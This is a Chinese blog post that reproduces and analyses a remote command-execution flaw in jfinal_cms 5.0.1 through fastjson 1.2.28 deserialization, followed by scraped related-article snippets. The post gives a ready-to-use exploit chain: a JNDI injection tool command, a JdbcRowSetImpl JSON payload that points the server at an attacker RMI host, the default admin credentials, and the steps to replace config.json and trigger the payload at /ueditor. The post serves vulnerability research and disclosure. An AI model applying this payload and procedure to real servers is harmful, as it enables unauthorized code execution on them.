Jfinal CMS命令注入漏洞

最新推荐文章于 2025-01-25 21:25:27 发布
最新推荐文章于 2025-01-25 21:25:27 发布
阅读量2.1k 收藏 1
点赞数
文章标签: java 安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MoLeft/article/details/128393531
版权

漏洞环境

jfinal_cms 5.0.1 中存在命令执行漏洞

JDK 版本要求:

  • 基于 RMI<=6u141、7u131、8u121 使用的 JDK 版本
  • 基于 LDAP<=6u211、7u201、8u191 使用的 JDK 版本。

jfinal_cms版本:5.0.1
fastjson版本:1.2.28

漏洞复用

测试中使用的JDK版本:JDK8u101

在 kali 上运行该工具,启动 rmi 和 ldap 服务
https://github.com/feihong-cs/JNDIExploit

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "calc.exe"

2022-11-17T12:30:22.png
替换payload中的rmi或ldap地址,然后保存到config.json

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.248.128:1099/6dxg2x",
        "autoCommit":true
    }
}

登录后台,找到模板管理,后台默认账号密码admin/admin123456
2022-11-17T12:33:58.png
找到config.json并点击,之后点replace file
2022-11-17T12:35:10.png
把刚才做好的payload上传
2022-11-17T12:35:33.png
访问 /ueditor,就会执行命令并弹出计算器

http://localhost:8080/jfinal_cms/ueditor

136699966-b0b2294c-cdf1-4145-9340-cc0885a7e73d.gif
利用成功,散会!

漏洞分析

com.jflyfox.component.controller.Ueditor
ActionEnter类在/ueditor路由的index方法中实例化
2022-11-17T12:38:14.png
com.baidu.ueditor.ActionEnter

ActionEnter类的构造方法中实例化
2022-11-17T12:39:52.png

com.baidu.ueditor.ConfigManager

ConfigManager调用的构造方法initEnv()
2022-11-17T12:40:25.png

com.baidu.ueditor.ConfigManager

initEnv调用JSONObject.parseObject来解析文件内容,这里的文件内容是可控的,只需将文件内容替换为payload即可
2022-11-17T12:41:17.png

com.baidu.ueditor.ConfigManager

如果后台存在任何文件上传漏洞,则可以将此文件替换为包含payload的文件,以触发 fastjson 反序列化WEB-INF/classes/config.json
2022-11-17T12:42:01.png
2022-11-17T12:42:09.png

jfinal对xss漏洞的处理
huangbaokang的博客
12-11 868
在我们的jfinal配置类当中,配置自定义Handler public void configHandler(Handlers handler) { //handler.add(我们自定义handler的实例) handler.add(new XssHandler()); } 新建XssHandler类,继承com.jfinal.handler.Handler public class XssHandler extends Handler{ @Overr
DedeCms V5.6 parse_str函数引起的sql注入漏洞
今天也要加油鸭
04-13 1297
这个是去年跟着红日代码审计复现的织梦cms有parse_str()函数引起的漏洞,特来记录一下。 一、下载 下载地址:http://www.dedecms/upimg/soft/2010/DedeCmsV5.6-UTF8-Final.tar.gz 二、安装 ...
Jfinal cms前台评论XSS漏洞分析
weixin_30535043的博客
05-14 610
Jfinal cms采用Java语言开发,官方代码仓库为:https://gitee.com/jflyfox/jfinal_cmsJfinal cms前台评论处存在XSS漏洞,以v4.6版本为例,下面是简单的漏洞分析。 首先来看如何利用此漏洞。 第一步:填写payload 在新闻评论的地方填写如下payload:abcd<img src="/xswv.png" onerror="...
JFinalcms 5.0.0代码审计(1)
weixin_44513407的博客
06-28 1004
JFinalcms代码审计
Jfinal_cms——SQL注入漏洞
最新发布
2302_76803532的博客
01-25 381
访问路由地址/system/department,orderBy最终的值其实是来自BaseForm类中orderColumn或者orderAsc的值,这个由我们给哪个参数传值决定,如果给orderColumn传值,那么最终的sql语句将变为。getOrderBy方法的意思是如果orderColumn 传入有值,就返回orderColumn的值,如果没有值,就返回orderAsc的值。从请求中获取值,也就是说form为空不为空其实是可控的,但是为空不为空返回的结果都是一个form对象。点击排序后抓到数据包。
jfinal xss过滤以及url注入漏洞的问题
qq_41182238的博客
04-29 1364
这里参考jfinal社区的xss处理方式这里简单记录一下。 1.首先:创建XssHandler 代码如下: package com.gdszgl.common.handler; import com.jfinal.handler.Handler; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.Http...
漏洞复现-Ruoyi若依系列
热门推荐
aming小老弟
05-02 2万+
官方漏洞历史文档。
[原创]K8飞刀Final
K8哥哥
04-15 5814
法律声明: 工具仅供安全研究或授权渗透,非法用途后果自负。工具: K8飞刀Final作者: K8哥哥博客: https://www.cnblogs.com/k8gege简介: 一款多功能网络安全渗透测试工具(Hacker Swiss Army Knife) 1.漏洞利用: 已集成20个主流WEB、CMS程序,累计115个EXP(如Drupal、Joomla、...
Node.js版本升级影响全解析:若依CMS前端兼容性考量
![Node.js版本升级影响全解析:若依CMS前端兼容性考量]...随后,文章深入探讨了若依CMS前端升级的兼容性策略,重点讨论了兼容性考量的重要性、测试方法以及解决方案。本文还通过案例分析,详细讨论了N
​Sqli - labs实战笔记
浪子燕青的博客
02-25 574
​Sqli - labs 安装与lesson1-4实战 所需环境: 1. PHP 2. MYSQL 3. Apache/Nginx 以上三项Debian都自带了,2与3直接开启即可,但是有几点要注意: 1. Debian下的MySql每次登录的时候默认需要授权,即必须使用sudo,可以修改配置文件忽略默认授权,修改方法在之前的文件有提起过. 2. Apache存放文件放在/var/www/html/目录下 3. sqli-labs 使用的PHP5编写的,但是Debian默认安装PHP7,兼..
jfinal cms-其他
06-12
<p>jfinal cms是一个java开发的功能强大的信息咨询网站,采用了简洁强大的JFinal作为web框架,模板引擎用的是beetl,数据库用mysql,前端bootstrap框架。 支持oauth2认证、帐号注册、密码加密、评论及回复,消息提示,网站访问量统计,文章评论数和浏览量统计,回复管理,支持权限管理。</p><p>平台部署说明: 1、数据库配置文件:src/conf/db.properties 2、安装mysql数据库,创建用户和数据库。 3、运行jfinal_cms.sql文件。 4、如需要oauth2的,设置src/conf/oauth.properties 5、通过config.properties的ATTR.PATH_PC=/template/mtg配置可以切换模板,记得数据库数据对应哦。 6、如果是/template/website模板,请运行jfinal_cms_website.sql脚本。</p>
jfinal框架中防跨站脚本XSS攻击。
志全的博客
07-27 1160
跨站脚本攻击(XSS) Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而达到恶意攻击用户的目的。 问题解决: 对于Jfinal轻量级框架解决方式从框架根本从特殊字符转义入手。 1、处理器配置初始化 public void configHandler(Handlers me) { XssHandler xssHan...
jfinal 检测到目标URL存在http host头攻击漏洞的解决方法
qq_41182238的博客
04-30 809
记录编写handler 来对此漏洞进行修复 编写handler 来对此漏洞进行修复 注:JFinal的 Handler是 AOP + 责任链 模式的一个变种,JFinal对action及interceptor处理自身也是一个Handler名叫ActionHandler,可见其功能之强大。平时开发的时候一般不需要使用,当Action与Interceptor还不够用的时候可以考虑Handler上场。另...
jfinal获取url链接上面传来的string类型的值_SSRF漏洞攻击Redis-从零到获取Shell(脚本+视频)...
weixin_39951018的博客
10-22 1248
!!!文末有视频讲解!!!一、本节课程需要的主机Kali2.0Windows Server2003二、本节课需要的工具Redisncwiresharktcpdumppython2.7docker三、文章目录0x01 Redis基础0x02 Redis入侵,反弹shell0x03 Redis认证攻击0x04 写ssh-keygen公钥,使用私钥登陆0x05 写webshell0x01 Redis基础...
jfinal 1.8 事务不生效问题。
a290450134的博客
06-15 1060
本次使用事务方式:Db.tx(new IAtom() { public boolean run() throws SQLException { try { //用户基本信息 User.dao.insertInfo(basicInfoMap); //资产信息 Ohter.dao.insertInfo(otherMapList); ...
JFinalcms代码审计
蚁景网安学院
10-14 720
JFinalCms是开源免费的JAVA企业网站开发建设管理系统,极速开发,动态添加字段,自定义标签,动态创建数据库表并crud数据,数据库备份、还原,动态添加站点(多站点功能),一键生成模板代码。
Java JFinal_cms的一次审计过程
include_voidmain的博客
01-10 993
可以通过安全管理器配置到底哪些类Beetl不允许调用,具体请参考高级用法。
jfinal 3.8 Controller多层继承无法暴露,访问404
xqhys的博客
05-14 448
要配置一下: routes.setMappingSuperClass(true); 在升级文档中有过说明: https://www.jfinal.com/doc/14-1 这是一个性能优化,默认不对超类中的方法进行迭代生成路由 如果希望既可以对超类进行路由映射,又能保留这个优化,可以在其子路由中配置: public class SubRoutes extends Routes { public void config() { setMappingSuperClass(true); add(...)
基于jfinal的XssHandler,统一处理xss脚本攻击
weixin_34227447的博客
08-10 489
2019独角兽企业重金招聘Python工程师标准>>> ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

用砖头敲代码

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值